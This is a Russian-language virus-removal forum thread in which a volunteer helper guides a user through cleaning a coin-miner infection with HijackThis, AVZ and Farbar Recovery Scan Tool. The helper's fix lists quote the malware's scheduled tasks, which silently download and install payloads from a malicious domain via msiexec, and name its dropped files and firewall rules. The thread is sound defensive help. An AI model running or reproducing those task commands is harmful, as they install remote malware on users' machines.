CoinMiner.DQ

Printable View

15.10.2018, 21:12
acidsykt

CoinMiner.DQ

Здравствуйте, помогите избавится от вируса, засел в "Оперативная память = C:\Windows\SysWOW64\svchost.exe". Периодически открываются рандомные сайты. Нод32 удалить не может, но ругается. По глупости запустил один exe-шник и проигнорил предупреждение. Что делать?
15.10.2018, 21:16
Info_bot

Уважаемый(ая) [B]acidsykt[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
15.10.2018, 21:25
Vvvyg

Запустите HijackThis, расположенный в папке Autologger (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B])и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url] :[code]O22 - Task: {2F817A83-8B15-6417-4F79-B191281625BD} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://101news101.org/cl/?guid=4j2hg3xffc2vbvwfyj56v384qhse8ei2&prid=1&pid=4_1092_0
O22 - Task: {33E47170-651F-03C9-F0E3-7D53A1433D31} - C:\Users\acid\tmYYIUe.exe -i http://inthemel.info/p3qst89l9vbw.yie -q
O22 - Task: {8CB255B6-B941-82C7-1F33-19F77C9FD5AA} - C:\Windows\system32\msiexec.exe -i http://inthemel.info/qfzzdqrdghef.hoo -q[/code]
Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url] при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.
15.10.2018, 23:16
acidsykt

Пока не уверен, но вроде полет нормальный. Спасибо за быструю помощь :thumbs:
16.10.2018, 06:53
Vvvyg

Результат скрипта в AVZ прикрепите ещё.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
16.10.2018, 09:47
acidsykt

AVZ мне сказал что все в порядке и никаких логов не создал.
16.10.2018, 20:34
Vvvyg

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
2018-10-11 20:24 - 2017-09-15 21:20 - 000000000 ____D C:\ProgramData\boost_interprocess
2009-07-14 04:14 - 2009-07-14 04:14 - 000073216 ____N (Microsoft Corporation) C:\Users\acid\tmYYIUe.exe
2009-07-14 04:14 - 2009-07-14 04:14 - 000186368 ____N (Microsoft Corporation) C:\Users\acid\AppData\Roaming\ElARAemlCOoEO.exe
2017-07-18 22:27 - 2017-07-19 11:53 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.1.txt
2017-07-18 22:27 - 2017-07-19 11:26 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.2.txt
2017-07-18 22:27 - 2017-07-19 10:57 - 000000919 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.3.txt
2017-07-18 22:27 - 2017-07-18 22:27 - 000001181 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.4.txt
2017-07-18 22:27 - 2017-07-19 12:30 - 000000919 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.txt
2017-07-18 22:27 - 2017-07-19 12:30 - 000000000 _____ () C:\Users\acid\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
FirewallRules: [{774974B9-F485-4500-B455-67C1E740DD3F}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{C133EAFC-1BBB-4C46-9C28-B2C6353EF2AA}] => (Allow) C:\Windows\SysWOW64\HuolUsAgMiaV.exe
FirewallRules: [{E31F3CB3-F0C7-4F08-A3A1-C09BEC56E619}] => (Allow) C:\Users\acid\tmYYIUe.exe
FirewallRules: [{73CA5F1B-4471-4C25-A1C9-6371DE6E3A2F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{15004EB8-6539-4CC4-85BA-829B728BD8D7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{705E5853-1E58-4D53-836B-B34AD2BDC547}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2E97151C-A8C0-49A0-A294-F7CD606630F7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DC4879A0-D62E-4453-9FC7-675A54137D72}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1FFD8906-1894-4A1C-81D5-492DD61DCB94}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DA1F91B6-CBD5-44F2-92A0-E1C5579578F0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0D418CC5-B01A-41FC-9DCA-7FE82CCA938A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DD750106-1D8C-4200-949B-6DABF01090FF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5213EE0E-76D7-4468-9074-E19C934709C6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7EDEDA6C-AAB4-4D44-A986-EB0C70468910}] => (Allow) C:\Windows\SysWOW64\svchost.exe
Reboot:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U],
Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
17.10.2018, 10:50
acidsykt

Вложений: 1

Сделано
17.10.2018, 21:33
Vvvyg

Все остатки майнера дочистили.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.